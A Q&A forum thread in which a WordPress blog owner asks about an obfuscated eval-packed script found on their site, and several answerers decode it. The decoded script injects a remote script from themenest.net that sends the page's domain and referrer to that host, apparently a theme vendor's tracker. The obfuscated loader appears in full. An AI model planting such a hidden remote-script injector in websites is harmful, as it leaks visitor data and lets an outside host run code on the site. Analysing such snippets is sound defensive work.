What does this code do on my WordPress Blog ? Malware?

i found following code loading everytime the site loads, Please reply me about the function it does on my blog ?,

themenest.net is the url i see , when i see loading my site

Read More
<script type="text/javascript">
    eval(function (p, a, c, k, e, r) {
        e = function (c) {
            return c.toString(a)
        };
        if (!''.replace(/^/, String)) {
            while (c--) r[e(c)] = k[c] || e(c);
            k = [function (e) {
                    return r[e]
                }
            ];
            e = function () {
                return '\w+'
            };
            c = 1
        };
        while (c--) if (k[c]) p = p.replace(new RegExp('\b' + e(c) + '\b', 'g'), k[c]);
        return p
    }('0.f('<2'+'3 5="6/7" 8="9://a.b/e/o/g?d='+0.h+'&i='+j(0.k)+'&c='+4.l((4.m()*n)+1)+'"></2'+'3>');', 25, 25, 'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'), 0, {}));
</script>

Anyone knows ??

Related posts

Leave a Reply

4 comments

  1. If you unpack it, the code is:

    document.write('<scr' + 'ipt type="text/javascript" src="http://themenest.net/platform/script/track?d=' + document.domain + '&r=' + encodeURIComponent(document.referrer) + '&c=' + Math.floor((Math.random() * 1000) + 1) + '"></scr' + 'ipt>');
    

    …which retrieves a script resource from http://themenest.net/platform/script/track passing in information about the document it’s in and the referring link that brought you to that document. I don’t know what that script resource might be (it might be nothing, the point could just be tracking; look in the Network tab of your browser to see what comes back).

    Whether it’s some kind of malware depends on your relationship with themenest.net. 🙂

  2. That code injects this script element:

    <script type="text/javascript" src="http://themenest.net/platform/script/track?d='+document.domain+'&r='+encodeURIComponent(document.referrer)+'&c='+Math.floor((Math.random()*1000)+1)+'"></script>
    

    It’s a tracker, most likely from themenest (the place where you originally got the theme), which detects the usage of their themes across users. This is most likely an analytics script for them.

    The script gets:

    • your domain name (the current page domain, the website using the theme)
    • the referrer (where you were before arriving to a page of that site containing that script)
    • and uses a cache busting mechanism to load the latest version of the script everytime
  3. It looks like this is for referal and/or logging referer domains as you can see there

    track|domain|r|encodeURIComponent|referrer
    

    You would need to unpack it to see the real source.

    Just unpacked it, there you go:

    <script type="text/javascript" src="http://themenest.net/platform/script/track?d='+document.domain+'&r='+encodeURIComponent(document.referrer)+'&c='+Math.floor((Math.random()*1000)+1)+'"></script>
    

    As i wrote above it just logs your domain to the themenest.net Servers.

    I guess so find out copyright abuses.

  4. This has something to do wit referrals, tracking and domains. It is packed so the exact code can’t be readed. Only if you un-pack it:

    eval document.write('<scr'+'ipt type="text/javascript" src="http://themenest.net/platform/script/track?d='+document.domain+'&r='+encodeURIComponent(document.referrer)+'&c='+Math.floor((Math.random()*1000)+1)+'"></scr'+'ipt>');